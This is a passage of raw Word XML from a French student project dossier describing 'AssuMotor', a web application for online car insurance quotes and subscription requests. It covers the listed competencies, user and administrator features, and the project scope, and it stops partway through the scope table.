              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="125842684" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1A4467E7" wp14:editId="3504BEA7">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>209550</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>62865</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="152400" cy="76200"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="839860527"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8507A" id="Signe de multiplication 2" o:spid="_x0000_s1026" style="position:absolute;margin-left:16.5pt;margin-top:4.95pt;width:12pt;height:6pt;z-index:1258426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Développer des composants d'accès aux données SQL et NoSQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B0F49E" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="001D53B0">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="143820210" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0EA23558" wp14:editId="1212E8D5">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>209550</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>59690</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="152400" cy="76200"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1385805664"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3640F" id="Signe de multiplication 2" o:spid="_x0000_s1026" style="position:absolute;margin-left:16.5pt;margin-top:4.7pt;width:12pt;height:6pt;z-index:143820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Développer des composants métier côté serveur</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA53161" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="003239D4">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Documenter le déploiement d'une application dynamique web ou web mobile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E644A3A" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="002A5F4C">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="488073CD" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="003239D4">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc233817723"/>
      <w:r>
        <w:t>Compétences transversales</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="02E76C6C" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="001D53B0">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="161797736" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="43AF432E" wp14:editId="7A7AF6E3">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>209550</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>56515</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="152400" cy="76200"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1247507962"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189C9" id="Signe de multiplication 2" o:spid="_x0000_s1026" style="position:absolute;margin-left:16.5pt;margin-top:4.45pt;width:12pt;height:6pt;z-index:161797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Communiquer en français et en anglais</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="033722C3" w14:textId="3BF947C1" w:rsidR="002A5F4C" w:rsidRDefault="00EE4180">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="197752788" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="654284F6" wp14:editId="7005026C">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>209550</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>62865</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="152400" cy="76200"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="567077000"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BBE31" id="Signe de multiplication 2" o:spid="_x0000_s1026" style="position:absolute;margin-left:16.5pt;margin-top:4.95pt;width:12pt;height:6pt;z-index:1977527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rsidR="003239D4">
        <w:t>Mettre en œuvre une démarche de résolution de problème</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="753D36CE" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="001D53B0">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="179775262" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="34C999B5" wp14:editId="5A5E558E">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>209550</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>56515</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="152400" cy="76200"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="130203529" name="Signe de multiplication 2"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="152400" cy="76200"/>
                        </a:xfrm>
                        <a:prstGeom prst="mathMultiply">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38AB" id="Signe de multiplication 2" o:spid="_x0000_s1026" style="position:absolute;margin-left:16.5pt;margin-top:4.45pt;width:12pt;height:6pt;z-index:179775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" path="m32595,26316l40610,10286,76200,28081,111790,10286r8015,16030l96238,38100r23567,11784l111790,65914,76200,48119,40610,65914,32595,49884,56162,38100,32595,26316xe" fillcolor="black [3213]" stroked="f" strokeweight=".5pt">
                <v:stroke joinstyle="miter"/>
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="32595,26316;40610,10286;76200,28081;111790,10286;119805,26316;96238,38100;119805,49884;111790,65914;76200,48119;40610,65914;32595,49884;56162,38100;32595,26316" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:t>Apprendre en continu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03CC3A8D" w14:textId="0B5BF1D1" w:rsidR="002A5F4C" w:rsidRDefault="003239D4" w:rsidP="00506741">
      <w:pPr>
        <w:pStyle w:val="Titre1"/>
        <w:spacing w:before="0"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:bookmarkStart w:id="5" w:name="_Toc233817724"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>2. EXPRESSION DES BESOINS DU PROJET</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="0166319D" w14:textId="2BB5306D" w:rsidR="002A5F4C" w:rsidRDefault="00EE4180" w:rsidP="0073449E">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc233817725"/>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="215730314" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="408F0309" wp14:editId="0B3AE146">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>4513580</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="margin">
              <wp:posOffset>749300</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1174115" cy="1136650"/>
            <wp:effectExtent l="0" t="0" r="6985" b="6350"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="82596906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9068" name="Image 8259690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4115" cy="1136650"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="margin">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="margin">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="003239D4">
        <w:t>2.1 Présentation générale du projet</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="17084B8D" w14:textId="77777777" w:rsidR="00F86F99" w:rsidRDefault="00AB5AE7" w:rsidP="00F86F99">
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AB5AE7">
        <w:t>AssuMotor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AB5AE7">
        <w:t xml:space="preserve"> est une application web de gestion de demandes d'assurance automobile en ligne, destinée aux propriétaires de véhicules</w:t>
      </w:r>
      <w:r w:rsidR="00895F25">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AB5AE7">
        <w:t>souhaitant obtenir un devis et souscrire une assurance directement depuis leur navigateur, sans se déplacer en agence.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4889FA8C" w14:textId="00494C7F" w:rsidR="002A5F4C" w:rsidRDefault="00AB5AE7" w:rsidP="00F86F99">
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AB5AE7">
        <w:t>L'utilisateur peut créer un compte, obtenir un devis selon la formule choisie et le convertir en demande de souscription. Son espace personnel lui permet de suivre ses dossiers</w:t>
      </w:r>
      <w:r w:rsidR="00FF0FDE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FF0FDE" w:rsidRPr="00FF0FDE">
        <w:t>et de déposer ses documents justificatifs,</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB5AE7">
        <w:t xml:space="preserve"> tandis qu'un back-office administrateur assure la gestion et le suivi des demandes reçues.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="705DB4A2" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="00AB5AE7" w:rsidP="0073449E">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AB5AE7">
        <w:t>Le projet ne couvrira pas la gestion des sinistres après souscription, le paiement en ligne, la gestion d'un parc de véhicules ou d'un réseau d'agences, ni les notifications par e-mail. Il se concentre exclusivement sur la simulation de devis et la gestion des demandes de souscription automobile.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E7A61C" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="002A5F4C"/>
    <w:p w14:paraId="32DC525F" w14:textId="2582C780" w:rsidR="002A5F4C" w:rsidRDefault="003239D4" w:rsidP="0073449E">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc233817726"/>
      <w:r>
        <w:t>2.2 Public cible</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="1906728D" w14:textId="77777777" w:rsidR="00506741" w:rsidRDefault="00895F25" w:rsidP="0073449E">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>AssuMotor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> s’adresse à deux types d’utilisateurs</w:t>
      </w:r>
      <w:r w:rsidR="00AC4921">
        <w:t> :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ABD75C6" w14:textId="77777777" w:rsidR="00506741" w:rsidRDefault="00895F25" w:rsidP="00F86F99">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:spacing w:before="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">D’une part, tout propriétaire de véhicule (voiture, moto, utilitaire), qu’il soit jeune conducteur ou expérimenté, souhaitant obtenir un devis et souscrire une assurance simplement en ligne. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4950C3F4" w14:textId="39089EB6" w:rsidR="002A5F4C" w:rsidRDefault="00895F25" w:rsidP="00F86F99">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:spacing w:before="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>De l’autre, un administrateur chargé de traiter et suive les demandes reçues de puis le back-office.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A7A3F62" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="003239D4" w:rsidP="009E2796">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc233817727"/>
      <w:r>
        <w:t>Objectifs du projet</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="7EDE60F9" w14:textId="77777777" w:rsidR="00B70C5C" w:rsidRDefault="004A7283" w:rsidP="00095C05">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00095C05">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">L’application </w:t>
      </w:r>
      <w:r w:rsidR="00B70C5C" w:rsidRPr="00095C05">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="00095C05">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ermet</w:t>
      </w:r>
      <w:r w:rsidR="00B70C5C" w:rsidRPr="00095C05">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> à l’utilisateur de</w:t>
      </w:r>
      <w:r w:rsidR="00B70C5C">
        <w:t xml:space="preserve"> : </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="343B3083" w14:textId="77777777" w:rsidR="0022517F" w:rsidRDefault="00B70C5C" w:rsidP="00095C05">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Simuler un devis </w:t>
      </w:r>
      <w:r w:rsidR="0022517F">
        <w:t>et obtenir une estimation tarifaire selon les informations saisis</w:t>
      </w:r>
      <w:r w:rsidR="00A1534F">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC0D566" w14:textId="77777777" w:rsidR="00CD0A35" w:rsidRDefault="0022517F" w:rsidP="00095C05">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t>Créer ses demandes de souscription</w:t>
      </w:r>
      <w:r w:rsidR="00B70C5C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">en convertissant un devis ou en créant </w:t>
      </w:r>
      <w:r w:rsidR="00CD0A35">
        <w:t>directement des nouvelles demandes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49C792A8" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="00CD0A35" w:rsidP="00095C05">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t>Disposer d’un espace personnel pour consulter et suivre l’historique de ses devis et demandes en temps réel.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08520064" w14:textId="77777777" w:rsidR="00FF0FDE" w:rsidRDefault="00FF0FDE" w:rsidP="00095C05">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r w:rsidRPr="00FF0FDE">
        <w:t>Déposer ses documents justificatifs liés à sa demande de souscription</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE5A923" w14:textId="77777777" w:rsidR="00FF0FDE" w:rsidRDefault="00A1534F" w:rsidP="00095C05">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r w:rsidRPr="00A1534F">
        <w:t>Suivre le statut de son paiement</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21966F05" w14:textId="77777777" w:rsidR="00436E52" w:rsidRDefault="00436E52" w:rsidP="00095C05">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="28"/>
        </w:numPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r w:rsidRPr="00436E52">
        <w:t>Gérer son compte personnel (inscription, connexion, modification de ses informations)</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="232DDB59" w14:textId="77777777" w:rsidR="004B30DA" w:rsidRPr="00095C05" w:rsidRDefault="004B30DA" w:rsidP="00095C05">
      <w:pPr>
        <w:spacing w:after="160" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00095C05">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>L'application permet à l'administrateur de :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3144B894" w14:textId="77777777" w:rsidR="004B30DA" w:rsidRPr="004B30DA" w:rsidRDefault="004B30DA" w:rsidP="00095C05">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r w:rsidRPr="004B30DA">
        <w:t>Consulter l'ensemble des demandes de souscription reçues</w:t>
      </w:r>
      <w:r w:rsidR="00A1534F">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3469D80A" w14:textId="77777777" w:rsidR="004B30DA" w:rsidRDefault="004B30DA" w:rsidP="00095C05">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r w:rsidRPr="004B30DA">
        <w:t>Mettre à jour le statut d'une demande (en attente, validée, refusée)</w:t>
      </w:r>
      <w:r w:rsidR="00A1534F">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B91BC0A" w14:textId="77777777" w:rsidR="00A1534F" w:rsidRPr="004B30DA" w:rsidRDefault="00A1534F" w:rsidP="00095C05">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r w:rsidRPr="00A1534F">
        <w:lastRenderedPageBreak/>
        <w:t>Consulter les documents déposés par les utilisateurs</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00E7C59F" w14:textId="77777777" w:rsidR="004B30DA" w:rsidRPr="004B30DA" w:rsidRDefault="004B30DA" w:rsidP="00095C05">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r w:rsidRPr="004B30DA">
        <w:t>Consulter la liste des utilisateurs inscrits</w:t>
      </w:r>
      <w:r w:rsidR="00A1534F">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56950D26" w14:textId="77777777" w:rsidR="00436E52" w:rsidRPr="00095C05" w:rsidRDefault="00436E52" w:rsidP="00095C05">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00095C05">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>L'application garantit :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F2640FA" w14:textId="77777777" w:rsidR="00436E52" w:rsidRDefault="00436E52" w:rsidP="00436E52">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r w:rsidRPr="00436E52">
        <w:t>La sécurité des données via le hachage des mots de passe, la protection CSRF, XSS et les injections SQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69977169" w14:textId="77777777" w:rsidR="00A1534F" w:rsidRPr="00436E52" w:rsidRDefault="00A1534F" w:rsidP="00A1534F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r w:rsidRPr="00A1534F">
        <w:t>Une interface responsive accessible depuis tout navigateur web</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E066A29" w14:textId="77777777" w:rsidR="004A7283" w:rsidRDefault="004A7283" w:rsidP="004A7283">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1723725A" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="003239D4" w:rsidP="00925D7A">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc233817728"/>
      <w:r>
        <w:t>2.4 Périmètre du projet (limites)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w14:paraId="45E696CD" w14:textId="77777777" w:rsidR="003A6B7F" w:rsidRDefault="003239D4" w:rsidP="00925D7A">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le tableau ci-dessous délimite ce que l'application </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>AssuMotor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> couvre et ce qu'elle exclut volontairement dans sa version actuelle.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A34017A" w14:textId="77777777" w:rsidR="003A6B7F" w:rsidRDefault="003A6B7F"/>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9026" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:top w:w="80" w:type="dxa"/>
          <w:left w:w="120" w:type="dxa"/>
          <w:bottom w:w="80" w:type="dxa"/>
          <w:right w:w="120" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="5242"/>
        <w:gridCol w:w="3784"/>
      </w:tblGrid>
      <w:tr w:rsidR="002A5F4C" w14:paraId="4ADA0517" w14:textId="77777777" w:rsidTr="00281897">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5242" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="EAF4EA"/>
          </w:tcPr>
          <w:p w14:paraId="78297856" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="003239D4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>✅ Dans le périmètre</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3784" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FAF0F0"/>
          </w:tcPr>
          <w:p w14:paraId="69FA8555" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="003239D4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>❌ Hors périmètre</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002A5F4C" w14:paraId="4DE4A557" w14:textId="77777777" w:rsidTr="00925D7A">
        <w:trPr>
          <w:trHeight w:val="3654"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5242" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="29021CD2" w14:textId="5B77DF49" w:rsidR="002A5F4C" w:rsidRDefault="00281897" w:rsidP="00281897">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="00281897">
              <w:t>■</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="003239D4">
              <w:t>Simulation de devis avec estimation tarifaire</w:t>
            </w:r>
            <w:r>
              <w:t>.</w:t>
            </w:r>
          </w:p>
